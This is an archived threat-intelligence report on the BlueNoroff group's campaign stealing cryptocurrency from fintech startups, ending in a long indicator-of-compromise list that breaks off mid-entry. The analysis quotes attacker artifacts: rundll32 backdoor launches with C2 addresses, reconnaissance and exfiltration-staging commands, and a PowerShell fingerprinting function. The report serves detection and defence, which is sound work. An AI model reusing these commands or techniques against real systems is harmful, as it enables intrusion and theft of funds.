{
	"id": "a293f9c2-40b8-4eb9-b721-34bf430d94a1",
	"created_at": "2026-04-06T00:16:38.217321Z",
	"updated_at": "2026-04-10T13:12:47.213474Z",
	"deleted_at": null,
	"sha1_hash": "03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f",
	"title": "The BlueNoroff cryptocurrency hunt is still on",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3433430,
	"plain_text": "The BlueNoroff cryptocurrency hunt is still on\r\nBy Seongsu Park\r\nPublished: 2022-01-13 · Archived: 2026-04-05 16:33:22 UTC\r\nBlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack\r\non Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial\r\nmotivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers,\r\nwith the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier\r\npublication about BlueNoroff attacks on the banking sector.\r\nAlso, we have previously reported on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff\r\nshifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main\r\nsource of the group’s illegal income. These attackers even took the long route of building fake cryptocurrency\r\nsoftware development companies in order to trick their victims into installing legitimate-looking applications that\r\neventually receive backdoored updates. We reported about the first variant of such software back in 2018, but\r\nthere were many other samples to be found, which was later reported by the US CISA (Cybersecurity and\r\nInfrastructure Security Agency) in 2021.\r\nThe group is currently active (recent activity was spotted in November 2021).\r\nThe latest BlueNoroff’s infection vector\r\nIf there’s one thing BlueNoroff has been very good at, it’s the abuse of trust. Be it an internal bank server\r\ncommunicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software\r\ninstalling an update with a backdoor to compromise its own user, or other means. 
Throughout its SnatchCrypto\r\ncampaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and\r\ninteraction with external entities.\r\nAccording to our research this year, we have seen BlueNoroff operators stalking and studying successful\r\ncryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and\r\nunderstand possible topics of interest. This lets them mount high-quality social engineering attacks that look like\r\ntotally normal interactions. A document sent from one colleague to another on a topic that is currently being\r\ndiscussed is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification\r\nof the necessary people and the topics they are discussing at a given time.\r\nIn a simple scenario, it can appear as a notification of a shared document via Google Drive from one\r\ncolleague/friend to another:\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 1 of 28\n\nNote the tiny “X” image – it’s an icon for an image that failed to load. We opened the email on an offline system;\r\nif the system had been connected to the internet, there would be a real icon for a Google document loaded from a\r\nthird-party tracking server that immediately notifies the attacker that the target opened the email.\r\nBut we also observed a slightly more elaborate approach in which an email is forwarded from one colleague to\r\nanother. This works even better for the attacker, because the original email and the attachment appear to have\r\nalready been checked by the forwarding party. Ultimately, it elevates the level of trust sufficiently for the\r\ndocument to be opened.\r\nWe haven’t shown the forwarder address as it belongs to an attacked user, but note there is a piece of text that\r\nreads “via sendgrid.net”. 
There is no website at sendgrid.net, but it may be a domain owned by a US-based\r\ncompany called Sendgrid, which specializes in email distribution and email marketing campaigns. According to its\r\nwebsite, it offers rich user-tracking capabilities and claims to be sending 90 billion emails every month. It seems\r\nto be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or\r\nsender address forgery in the case of an attack) with nothing more than the short remark “via sendgrid.net”. We\r\ninformed Sendgrid of this activity. Of course, many users could easily overlook the remark or simply not know\r\nwhat it means. The person whose name was abused here seems to be in the top management of the Digital\r\nCurrency Group (dcg.co), according to public information. To make it clear, we believe that neither the employee\r\nnor the company itself has anything to do with this attack or the email.\r\nWhich other company names have they abused? There are many. We have compiled a list of names and logos so\r\nyou can watch out for them in your inbox.\r\nThe companies whose logos are displayed here were chosen by BlueNoroff for impersonation in social\r\nengineering tricks. Note that this is no proof that the companies listed were compromised.\r\nIf you recognize them in incoming communication, there’s no reason to panic, but proceed with caution. 
For\r\nexample, you can open the incoming documents in a sandboxed or virtualized offline environment, convert the\r\ndocument to a different format or use a non-standard viewer (e.g., a server-side document viewer such as Google Docs,\r\nCollabora Online, ONLYOFFICE, Microsoft Office Online, etc.).\r\nIn some cases, we saw what looked like the compromise of an existing registered company and the subsequent use\r\nof its resources such as social media accounts, messengers and email to initiate business interaction with the\r\ntarget. If a venture capital company approaches a startup and sends files that look like an investment contract or\r\nsome other promising documents, the startup won’t hesitate to open them, even if some risk is involved and\r\nMicrosoft Office adds warning messages.\r\nA compromised LinkedIn account of an actual company representative was used to approach a target and engage\r\nwith them. The real company’s website is different from the one referenced in the conversation. By manipulating\r\ntrust in this way, BlueNoroff doesn’t even need to burn valuable 0-days. Instead, they can rely on regular macro-enabled documents or older exploits.\r\nWe found they generally stick to CVE-2017-0199, using it again and again before trying something else. The\r\nvulnerability initially allowed automatic execution of a remote script linked to a weaponized document. The\r\nexploit relies on fetching remote content via an embedded URL inside one of the document meta files. 
An\r\nattentive user may even spot that something fishy is happening while MS Word shows a standard loading popup\r\nwindow.\r\nIf the document was opened offline or the remote content was blocked, it presents some legitimate content, likely\r\nscraped or stolen from another party.\r\nIf the document isn’t blocked from connecting to the internet, it fetches a remote template that is another macro-enabled document. The two documents are like two ingredients of an explosive that when mixed together produce\r\na blast. The first one contains two base64-encoded binary objects (one each for 32-bit and 64-bit Windows) declared as\r\nimage data. The second document (the remote template) contains a VBA macro that extracts one of these objects and\r\nspawns a new process (notepad.exe) into which it injects and executes the binary code. Although the binary objects have JPEG\r\nheaders, they are actually just PE files with modified headers.\r\nInterestingly, BlueNoroff shows improved opsec at this stage. The VBA macro does a cleanup by removing the\r\nbinary objects and the reference to the remote template from the original document and saving it to the same file.\r\nThis essentially de-weaponizes the document, leaving investigators scratching their heads during analysis.\r\nAdditionally, we’ve seen that this actor utilized an elevation of privilege (EoP) technique in the initial infection\r\nstage. According to our telemetry, the word.exe process, created by opening the malicious document, spawned the\r\nlegitimate process dccw.exe. The dccw.exe process is a Windows system file that has auto-elevate permission.\r\nAbusing the dccw.exe file is a known technique and we suspect the malware authors used it to run the next stage\r\nmalware with high privilege. 
In another case, we have observed word.exe spawning a notepad.exe that received a\r\nmalware injection and in turn spawned mmc.exe. Unfortunately, the full details of this technique are unavailable\r\ndue to some missing parts.\r\nMalware infection\r\nWe assess that the BlueNoroff group’s interest in cryptocurrency theft started with the SnatchCrypto campaign\r\nthat has been running since at least 2017. While tracking this campaign, we’ve seen several full-infection chains\r\ndeliver malware. For the initial infection vector, they usually utilized zipped Windows shortcut files or\r\nweaponized Word documents. Note that this group has various methods in its infection arsenal and assembles\r\nthe infection chain to suit the situation.\r\nInfection chain #1. Windows shortcut\r\nThe group has been utilizing this infection vector for a long time. The actor sent an archive-type file containing a\r\nshortcut file and a document to the victim. All archives used for the initial infection vector had a similar structure.\r\nThe archive contained a password-protected document file, such as a Word, Excel or PDF file, alongside\r\nanother file disguised as a text file containing the document’s password. This file is in fact a Windows shortcut file\r\nused to fetch the next stage payload.\r\nArchive file and its contents\r\nBefore implanting a Windows executable type backdoor, the malware delivered a Visual Basic Script and a\r\nPowerShell script through multiple stages.\r\nInfection chain\r\nThe fetched VBS file is responsible for fingerprinting the victim by sending basic system information, network\r\nadapter information, and a process list. Next, the PowerShell agent is delivered in encoded format. 
It also sends the\r\nvictim’s general information to the C2 server, after which the next PowerShell agent, which is capable of executing commands\r\nfrom the malware operator, is delivered.\r\nVBS and PowerShell delivery chain\r\nUsing this PowerShell agent a full-featured backdoor is created, executing with the command line parameter:\r\nrundll32.exe %Public%\\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l\r\nThe malware checks the command line parameter, decoding it with base64 and decrypting it with an embedded\r\nkey. The decrypted data contains:\r\n63429981 63407466 45.238.25[.]2 443\r\nTo verify the parameter’s legitimacy, the malware XORs the second value with the hex value 0x5837 and\r\ncompares the result with the first value. If both values match, the malware returns the decrypted C2 address and port.\r\nThe malware also loads a configuration file (%Public%\\Videos\\OfficeIntegrator.dat in this case), decrypting it\r\nusing RC4. This configuration file contains the C2 addresses and the path of the next stage payload to be loaded. The\r\nmalware has rich backdoor functionality for controlling infected machines:\r\nDirectory/File manipulation\r\nProcess manipulation\r\nRegistry manipulation\r\nExecuting commands\r\nUpdating configuration\r\nStealing stored data from Chrome, Putty, and WinSCP\r\nThese are used to deploy other malware tools to monitor the victim: a keylogger and screenshot taker.\r\nInfection chain #2. Weaponized Word document\r\nAnother infection chain we’ve seen started from a malicious Word document. This is where the actor utilized\r\nremote template injection (CVE-2017-0199) with an embedded malicious Visual Basic Script. 
In one file (MD5:\r\ne26725f34ebcc7fa9976dd07bfbbfba3) the remotely fetched template refers to the first stage document and reads\r\nthe encoded payload from it, injecting it into a legitimate process.\r\nRemote template infection chain\r\nThe other case embedded a malicious Visual Basic Script and extracted a PowerShell agent on the victim’s system.\r\nGoing through this initial infection procedure results in a Windows executable payload being installed.\r\nInfection chain\r\nPersistence backdoor #1 is created in the Start menu path as its persistence mechanism, and its first\r\nexport function is invoked with the C2 address:\r\nrundll32.exe \"%appdata%\\microsoft\\windows\\start menu\\programs\\maintenance\\default.rdp\",#1\r\nhttps://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==\r\nUpon execution, the malware generates a unique installation ID based on the combined hostname, username and\r\ncurrent timestamp, which are concatenated and hashed using a simple string hashing algorithm. After sending a\r\nbeacon to the C2 server, the malware collects general system information, sending it after AES encryption. The\r\ndata received from the server is expected to have the following structure:\r\n@ PROCESS_ID # DLL_FILE_SIZE : DLL_FILE_DATA\r\nThe PROCESS_ID indicates the target process into which the malware will inject a new DLL. DLL_FILE_SIZE\r\nis the size of the DLL file to inject. And lastly, DLL_FILE_DATA contains the actual binary executable file to\r\ninject.\r\nBased on our telemetry, the actor used another type of backdoor. Persistence backdoor #2 is used to silently\r\nrun an additional executable payload that is received over an encrypted channel from a remote server. 
The server\r\naddress is not hardcoded but rather stored in an encrypted file on the disk\r\n(%WINDIR%\\AppPatch\\PublisherPolicy.tms), whose path is hardcoded in the backdoor. The decrypted\r\nconfiguration file has an identical structure to the configuration file used in Infection chain #1.\r\nAs we can see from the above case, the actor behind this campaign delivered the final payload through a multi-stage\r\ninfection, carefully delivering each next payload only after checking the fingerprint of the victim. This makes it harder\r\nto collect indicators to respond to the attack. With a strict infection chain, a full-featured Windows executable type\r\nbackdoor is installed. This custom backdoor has long been attributed only to the BlueNoroff group, so we strongly\r\nbelieve that the BlueNoroff group is behind this campaign.\r\nAssets theft\r\nCollecting credentials\r\nAfter implanting a full-featured backdoor, this threat actor usually follows the discovery and collection strategy\r\ncommon to APT threat actors. We managed to identify BlueNoroff’s hands-on\r\nactivities on one victim and observed that the group delivered the final payload very selectively. The malware\r\noperator mostly relied on Windows commands when performing initial profiling. 
They collected user accounts, IP\r\naddresses and session information:\r\ncmd.exe /c \"query session \u003e%temp%\\TMPBFF2.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"ipconfig /all \u003e%temp%\\TMPEEE2.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"whoami \u003e%temp%\\TMP218C.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"net user [user account] /domain \u003e%temp%\\TMP4B7C.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"net localgroup administrators \u003e%temp%\\TMP9518.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"query session \u003e%temp%\\TMPBFF2.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"ipconfig /all \u003e%temp%\\TMPEEE2.tmp 2\u003e\u00261\"\r\nIn the collection phase, the malware operator also relied on Windows commands. After finding folders of interest,\r\nthey copied a folder named 策略档案 (Chinese for “Policy file”) to the previously created “MM” folder for\r\nexfiltration. Also, they collected a configuration file related to cryptocurrency software in order to extract possible\r\ncredentials or other account details.\r\ncmd.exe /c \"mkdir %public%\\MM \u003e%temp%\\TMPF522.tmp 2\u003e\u00261\"\r\nxcopy \"%user%\\Desktop\\[redacted]工作文档\\MM策略档案\" %public%\\MM /S /E /Q /Y\r\ncmd.exe /c \"rd /s /q %public%\\MM \u003e%temp%\\TMP729D.tmp 2\u003e\u00261\"\r\ncmd.exe /c \"type D:\\2\\Crypt[redacted]\\Crypt[redacted].conf \u003e%temp%\\TMP496B.tmp 2\u003e\u00261\"\r\nFrom one victim, we discovered that the operators manually copied a file that was created by one of the\r\nmonitoring utilities (such as screenshot or keystroke data) to the %TEMP% folder in order to be sent to an\r\nattacker-controlled remote resource.\r\ncmd.exe /c \"copy \"%appdata%\\Microsoft\\Feeds\\Creds_5FADD329.dat\" %public%\\\r\n\u003e%temp%\\TMP11C4.tmp 2\u003e\u00261\"\r\nStealing cryptocurrency\r\nIn some cases where the attackers realized they had found a prominent target, they carefully monitored the user\r\nfor weeks or months. 
They collected keystrokes and monitored the user’s daily operations, while planning a\r\nstrategy for financial theft.\r\nIf the attackers realize that the target uses a popular browser extension to manage crypto wallets (such as the\r\nMetamask extension), they change the extension source from the Web Store to local storage and replace the core\r\nextension component (background.js) with a tampered version. At first, they are interested in monitoring\r\ntransactions. The screenshot below shows a comparison of two files: a legitimate Metamask background.js file\r\nand its compromised variant with injected lines of code highlighted in yellow. You can see that in this case they set\r\nup monitoring of transactions between a particular sender and recipient address. We believe they have a vast\r\nmonitoring infrastructure that triggers a notification upon discovering large transfers.\r\nThe details of the transaction are automatically submitted via HTTP to a C2 server:\r\nIn another case, they realized that the user owned a substantial amount of cryptocurrency, but used a hardware\r\nwallet. The same method was used to steal funds from that user: they intercepted the transaction process and\r\ninjected their own logic.\r\nAll this sounds easy, but in fact it requires a thorough analysis of the Metamask Chrome extension, which is over\r\n6MB of JavaScript code (about 170,000 lines of code), and the implementation of a code injection that rewrites\r\ntransaction details on demand when the extension is used.\r\nThis way, when the compromised user transfers funds to another account, the transaction is signed on the\r\nhardware wallet. 
However, because the user initiated the action themselves at that very moment, the user\r\ndoesn’t suspect anything fishy is going on and confirms the transaction on the secure device without paying\r\nattention to the transaction details. The user doesn’t get too worried when the size of the payment he/she inputs is\r\nlow and the mistake feels insignificant. However, the attackers modify not only the recipient address, but also\r\npush the amount of currency to the limit, essentially draining the account in one move.\r\nThe injection is very hard to find manually unless you are very familiar with the Metamask codebase. However, a\r\nmodification of the Chrome extension leaves a trace. The browser has to be switched to Developer mode and the\r\nMetamask extension installed from a local directory instead of the online store. If the plugin comes from the\r\nstore, Chrome enforces digital signature validation for the code and guarantees code integrity. So, if you are in\r\ndoubt, immediately check your Metamask extension and Chrome settings.\r\nDeveloper mode enabled in Google Chrome\r\nIf you use Developer mode, make sure your important extensions come from the Web Store\r\nUnless you are a Metamask developer yourself, this may indicate a Trojanized extension\r\nSnatchCrypto’s victims\r\nThe targets of the SnatchCrypto campaign are not limited to specific countries and continents. This campaign is\r\naimed at various companies that by the nature of their work deal with cryptocurrencies and smart contracts, DeFi,\r\nblockchains, and the FinTech industry.\r\nAccording to our telemetry, we discovered victims from Russia, Poland, Slovenia, Ukraine, the Czech Republic,\r\nChina, India, the US, Hong Kong, Singapore, the UAE and Vietnam. 
However, based on the shortened URL click\r\nhistory and decoy documents, we assess there were more victims of this financially motivated attack campaign.\r\nBlueNoroff victims\r\nIn addition to the above-mentioned countries, we observed uploads of weaponized documents and compromised\r\nMetamask extensions from Indonesia, the UK, Sweden, Germany, Bulgaria, Estonia, Russia, Malta and Portugal.\r\nSnatchCrypto’s attribution\r\nWe assess with high confidence that the financially motivated BlueNoroff group is behind this campaign. As a\r\nresult of understanding the SnatchCrypto campaign’s full chain of infection, we can identify several overlaps with\r\nthe BlueNoroff group’s previous activities.\r\nVBA macro authorship\r\nAnalysis of the VBA macro from the remote template used during the initial infection revealed that the code\r\nmatched the style and technique previously used by Clément Labro, an offensive security researcher from the\r\ncompany SCRT based out of Morges, Vaud, Switzerland. The original code for process injection from the VBA\r\nmacro hasn’t been found in public, so either Clément developed it privately and it later became available\r\nto BlueNoroff, or someone adapted his other VBA code, such as the VBA-RunPE project.\r\nPowerShell scripts overlap\r\nOne tool this group relied on heavily is a PowerShell script. Through an initial infection they deployed\r\nPowerShell agents on several victims, sending basic system information and executing commands from the\r\ncontrol server. 
They have utilized this PowerShell continuously, while adding small updates.\r\nPowerShell script used in previous BlueNoroff campaign:\r\nfunction GetBasicInformation\r\n{\r\n$HostName = [System.Environment]::MachineName;\r\n$UserName = [System.Environment]::UserName;\r\n$DomainName = [System.Environment]::UserDomainName;\r\n$CurrentDir = [System.Environment]::CurrentDirectory;\r\n$BinPath = [System.Environment]::GetCommandLineArgs()[0];\r\n$OSVersion = [System.Environment]::OSVersion.VersionString;\r\n$Is64BitOS = [System.Environment]::Is64BitOperatingSystem;\r\n$Is64BitProcess = [System.Environment]::Is64BitProcess;\r\n$PSVersion = 'PS ' + [System.Environment]::Version;\r\n$BasicInformation = $HostName + '|' + $UserName + '|' + $DomainName + '|' + $CurrentDir + '|' + $BinPath + '|' + $OSVersion + '|' + $Is64BitOS + '|' + $Is64BitProcess + '|' + $PSVersion;\r\nreturn $BasicInformation;\r\n}\r\nfunction ProcessCommand\r\n{\r\nPowerShell script used in 2021 campaign:\r\nfunction GetBI\r\n{\r\n$HostName = [System.Environment]::MachineName;\r\n$UserName = [System.Environment]::UserName;\r\n$DomainName = [System.Environment]::UserDomainName;\r\n$CurrentDir = [System.Environment]::CurrentDirectory;\r\n$BinPath = [System.Environment]::GetCommandLineArgs()[0];\r\n$OSVersion = [System.Environment]::OSVersion.VersionString;\r\n$Is64BitOS = [System.Environment]::Is64BitOperatingSystem;\r\n$Is64BitProcess = [System.Environment]::Is64BitProcess;\r\n$PSVersion = [System.Environment]::Version;\r\n$BasicInformation = $HostName + '|' + $UserName + '|' + $DomainName + '|' + $CurrentDir + '|' + $BinPath + '|' + $OSVersion + '|' + $Is64BitOS + '|' + $Is64BitProcess + '|' + $PSVersion;\r\nreturn $BasicInformation;\r\n}\r\nfunction ProcessCommand\r\n{\r\nBackdoor overlap\r\nThrough the complicated infection chain, a Windows 
executable type backdoor is eventually installed on the\r\nvictim machine. We could only identify this backdoor malware on a few hosts. It has many code similarities with\r\npreviously known BlueNoroff malware. Using Kaspersky Threat Attribution Engine (KTAE), we see that the\r\nmalware binaries used in this campaign have considerable code similarities with known tools of the BlueNoroff\r\ngroup.\r\nCode similarity of backdoor\r\nIn addition, we can identify uncommon techniques typically found in the BlueNoroff group’s malware. The\r\ngroup’s malware acquires the real C2 address by XORing the resolved IP address with a hardcoded DWORD value.\r\nWe saw the same technique in our previous BlueNoroff report. The malware used in the SnatchCrypto campaign\r\nalso used the same technique to acquire real C2 addresses.\r\nSimilar C2 address acquisition scheme\r\nIn addition, based on the metadata of the Windows shortcut files, we found that the actor behind this campaign is\r\nfamiliar with the Korean operating system environment.\r\n[String Data]\r\nWorking Directory (UNICODE):   %currentdir%\r\nArguments (UNICODE):   hxxps://bit[.]ly/2Q9tfCz\r\nIcon location (UNICODE):   C:\\Windows\\notepad.exe\r\n[Console Code Page]\r\nCode page: 949 (EUC-KR)\r\nBlueNoroff’s indicators of compromise\r\nMalicious shortcut files\r\n033609f8672303feb70a4c0f80243349\r\n2100e6e585f0a2a43f47093b6fabde74\r\n4a3de148b5df41a56bde78a5dcf41975\r\n5af886030204952ae243eedd25dd43c4    Password.txt.lnk\r\n5f761f9aa3c1a76b17f584b9547a01a7    Password.txt.lnk\r\n7a4a0b0f82e63941713ffd97c127dac8    Password.txt.lnk\r\n813203e18dc1cc8c70d36ed691ca0df3\r\n961e6ec465d7354a8316393b30f9c6e9    Gdpr Password.txt.lnk\r\n9ea244f0a0a955e43293e640bb4ee646\r\na3c61de3938e7599c0199d2778f7d417    Password.txt.lnk\r\n
a5d4bfc3eab1a28ffbcba67625d8292e\r\na94529063c3acdbfa770657e9126b56d\r\nab095cb9bc84f37a0a655fbc00e5f50e\r\nb52d30d1db40d5d3c375c4a7c8a115c1\r\ndd2569684ca52ed176f1619ecbfa7aaa\r\ndff21849756eca89ebfaa33ed3185d95\r\ne18dd8e61c736cfc6fff86b07a352c12\r\ne546b851ac4fa5a111d10f40260b1466\r\ne6e64c511f935d31a8859e9f3147fe24    Password.txt.lnk\r\nea7ed84f7936d4cbafa7cec51fe39cf7\r\nf414f6590636037a6ec92a4d951bdf55\r\n4e207d6e930db4293a6d720cf47858fc\r\n5e44deca6209e64f4093beae92db0c93    Password.txt.lnk\r\n84c427e002fd162d596f3f43ce86fd6a    Password.txt.lnk\r\nc16977fefbdc825a5c6760d2b4ea3914\r\ne5d12ef32f9bd3235d0ac45013040589\r\n09bca3ddbc55f22577d2f3a7fda22d1c    Password.txt.lnk\r\n0eb71e4d2978547bd96221548548e9f0    Password.txt.lnk\r\nda599b0cde613b5512c13f299fec739e    Password.txt.lnk\r\n0c9170a2584ceeddb89e4c0f0a2353ed    Password.txt.lnk\r\n5053103dd5d075c1dc54edf1f8568098    Password.txt.lnk\r\n536bae311c99a4d46f503c68595d4431    Password.txt.lnk\r\n3078265f207fed66470436da07343732    Password.txt.lnk\r\n15f1ae1fed1b2ea71fdb9661823663c6    Password.txt.lnk\r\n56fe283ca3e1c1667191cc7764c260b6    Password.txt.lnk\r\n850751de7b8e158d86469d22ad1c3101    Password.txt.lnk\r\n1a8282f73f393656996107b6ec038dd5    Password.txt.lnk\r\n2ea2ceab1588810961d2fc545e2f957e    Password.txt.lnk\r\n561f70411449b327e3f19d81bb2cea08    Password.txt.lnk\r\n3812cdc4225182326b1425c9f3c2d50b    Password.txt.lnk\r\n4274e6dbc2b7aee4ef080d19fff47ce7    Password.txt.lnk\r\n427bdfe4425e6c8e3ea41d89a2f55870    Password.txt.lnk\r\n7a83be17f4628459e120a64fcab70bac    Password.txt.lnk\r\n5d662269739f1b81072e4c7e48972420    Password.txt.lnk\r\n244a23172af8720882ae0141292f5c47    Password.txt.lnk\r\na8e2c94abb4c1e77068a5e2d8943296c    Password.txt.lnk\r\n89c26cefa057cf21054e64b5560bf583    Xbox.lnk\r\n805949896d8609412732ee7bfb44900a    Password.txt.lnk\r\na2be99a5aa26155e6e42a17fbe4fd54d    Security Bugs in rigs.pdf.lnk\r\n28917b4187b3b181e750bf024c6adf70    
readme.txt.lnk\r\n9f8e51f4adc007bb0364dfafb19a8c11    UserAssist.lnk\r\n790a21734604b374cf260d20770bfc96    SALT Lending Opportunities.pdf.lnk\r\ndb315d7b0d9e8c9ca0aa6892202d498b    Password.txt.lnk\r\n02904e802b5dc2f85eec83e3c1948374    Security Bugs in Operation.pdf.lnk\r\nbaebc60beaced775551ec23a691c3da6\r\n302314d503ae88058cb4c33a6ac6b79b    Password.txt.lnk\r\naeac6f569fb9a7d3f32517aa16e430d6    Password.txt.lnk\r\n926DEEAF253636521C26442938013204\r\n8064e00b931c1cab6ba329d665ea599c    MSEdge.lnk\r\nbcb4a8f190f2124be57496649078e0ae\r\n781a20f27b72c1c901164ce1d025f641    MSAssist.lnk\r\n483e3e0b1dceb4a5a13de65d3556c3fe    MSAssist.lnk\r\nMalicious documents\r\n00a63a302dcaffc9f28826e9dba30e03    Abies VC Presentation.docx\r\nee9dda6bbbb1138263873dbef36a4d42    Abies VC Presentation.docx\r\n0f1c81c2023eae0fc092ce9f58213bcf    Abies VC Presentation.docx\r\n491e0d776f01f102d36155a46f1a8e3c    Ant Capital Presentation (Azure Protected).docx\r\nc33ce08ebcc6e508bb3a17e0fa7b08f8    Global Brain Pitch Deck.docx\r\nb1911ef720b17aeed69ec41c8e94cc1e\r\n340fb219872ce3c0d3acf924f4f9e598    Venture Labo Investment Pitch Deck.docx\r\n380e9e78dc5bc91fb6cdd8b4a875f20a\r\neb18ac97dba79ea48c185fb2826467fe\r\n2a9ff6d80cdd4aeed1c48a1ccdc525dd    Abies VC Presentation.docx\r\necf75bec770edcd89a3c16d3c4edde1a    Abies VC Presentation (1).docx\r\n6c4943f4c28a07ee8cae41dad16d72b3    Abies VC Presentation.docx\r\nf76e2e6bfbee77ae36049880d7c227f7    Abies VC Presentation.docx\r\n7aec3d1b24ed0946ab740924be5834fa    Abies VC Presentation.docx\r\n47e325e3467bfa80055b7c0eebb11212    Abies VC Presentation.docx\r\n1e0d96c551ca31a4055491edc17ce2dd    Abies VC Presentation.docx\r\nbcf97660ce2b09cbffb454aa5436c9a0    Digital Asset Investment Stategy 2020 (ISO 27001).docx\r\n13ff15ac54a297796e558bb96feaacfd    Abies VC Presentation(ISO 27001).docx\r\ncace67b3ea1ce95298933e38311f6d0b    
Adviser-Non-Disclosure-Agreement-NDA(ISO 27001).docx\r\n645adf057b55ef731e624ab435a41757    OKEx and DeepMind Intro Deck(ISO 27001_Protected).docx\r\nbde4747408ce3cfdfe8238a133ebcac9    Circle Business Introduction(ISO 27001).docx\r\n421b1e1ab9951d5b8eeda5b041cb0657    Berkshire Hathaway HomeServices Custody – Mutual NDA.docx\r\nd2f08e227cd528ad8b26e9bbe285ae3c    Union Square Ventures Partnership – Mutual NDA Form.docx\r\n04deb35316ebe1789da042c8876c0622    Chiliz Partnership – Mutual NDA Form.docx\r\naf4eefa8cddc1e412fe91ad33199bd71    FasterCapital Mutual NDA Form.docx\r\n34239a3607d8b5b8ddd6797855f2e827    FasterCapital Introduction 2020 Oct.docx\r\n389172d2794d789727b9f7d01ec27f75    Lundbergs NDA Mutual Form.docx\r\nf40e7998a84495648b0338bc016b9417    Union Square Ventures Partnership – Mutual NDA Form.docx\r\nc8c2a9c50ff848342b0885292d5a8cd4    VIRUS.docx\r\nadf9dc317272dc3724895cb07631c361    Non-Disclosure-Agreement-NDA(ISO 27001).docx\r\n158d84c90a79edb97ec5b840d86217c7    Venture Labo Investment Pitch Deck.docx\r\ne26725f34ebcc7fa9976dd07bfbbfba3    Global Brain Pitch Deck.docx\r\na435acb5bac92b855d1799a685507522\r\n9969b67ef643bed20a38346dcd69bec4\r\na6446bfea82b69169b4026222ca253b2\r\nbdf1643c3a10a25d3aba2c4c608ec5d5\r\nb4b695c8e6fea95db5843a43644f88b0\r\nd8561c74ad9624d7c35c0fb15d3ca8fe\r\nf9195b14ed20b30b7c239d50e6418151\r\n3dd638551b03a36d13428696dcada5d8\r\nf26eaa212c503aaba6e5015cb8ef44b5     Venture Labo Investment Pitch Deck.docx\r\n793de76de6d4015ebdd5e552ac5b2f90    Pantera Capital Investment Agreement(Protected).docx\r\n709ec9fbbc3c37ccd39758527c332b84    Pantera Capital Investment Agreement(Protected).docx\r\n89099235aad37a29b7acedc96fda0037    Venture Labo Investment Pitch Deck.docx\r\n358791e1abd64f490c865643a3fbb93d    Z Venture Capital Presentation(Protected).docx\r\ncea54a904434c66f217fbadc571e1507    Z Venture Capital 
Presentation(Protected).docx\r\n9be0075b9344590b3cabf61c194db180    Rapid Change of Stablecoin (Protected).docx\r\n98e30453bbf1c9c9f48368f9bbe69edd    Z Venture Capital Presentation(Protected).docx\r\n9ad7b21603ecce5ee744ba8aa387fb6c    Pantera Capital Investment Agreement(Protected).docx.123.docx.123\r\nInjected remote template\r\n3dd638551b03a36d13428696dcada5d8\r\n2da244dc9bbdbf2013b7fbc2a74073a2\r\nf3157dc297cb802c8ae2f07702903bfa\r\nVisual Basic Script\r\nce09cdb7979fb9099f46dd33036b9001    xivwtjab.vbs\r\nf7f4aa55a2e4f38a6a3ea5a108baedf5    vwnozphn.vbs\r\nPowershell\r\nae52b28b360428829c4fcdc14e839f19    usoclient.ps1\r\nPowershell agent(VBS-wrapped)\r\n73572519159b0c27a18dbbaf25ef1cc0  guide.vbs\r\n8ae6aa90b5f648b3911430f14c92440b  %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\check.vbs\r\nae12a668dd9f254c42fcd803c7645ed1  1.vbs\r\n589f1bb4da89cfd4a2f7f3489aa426a9  %APPDATA%\\microsoft\\windows\\start menu\\programs\\startup\\guide.vbs\r\nBackdoor\r\n1d0fc2f1a6eb2b2bfa166a613ca871f0\r\ndb91826cb9f2ad6edfed8d6bab5bef1f    users.dll, wmc.dll\r\n9c592a22acdfb750c440fda31da4996c\r\nKeylogger\r\nf29be5c7e602e529339fda35ff91bd39\r\nScreencapture malware\r\nf194e074e7d73c544eebb70e2e2785a1\r\nInjector\r\nec2b51dc1dc99165a0eb46b73c317e25    cssvc.dll\r\nd8e51f1b9f78785ed7449145b705b2e4    cfssvc.dll\r\ndd2d50d2f088ba65a3751e555e0dea71    bfcsvc.dll\r\nf5317f1c0a10a80931378d68be9a4baa    lssc.dll\r\n8727a967bbb5ebd99789f7414d147c31    sst.dll\r\ncab281b38a57524902afcb1c9c8aa5ba    bnt.dll\r\n6a2cbaea7db300925d25d9decf461d95    lmsvc.dll\r\n33a60ea8859307d3fd1a1fe884e37d2d\r\n1993ebb00cb670c6e2ca9b5f6c6375c4    sessc.dll\r\n1fb48113d015466a272e4b70c3109e06    wssc.dll\r\n33ae39569f0051d8dc153d7b4e814a67\r\n525345989e10b64cd4d0e144eb48171f\r\n724d11c2cae561225e7ed31d7517dd40    
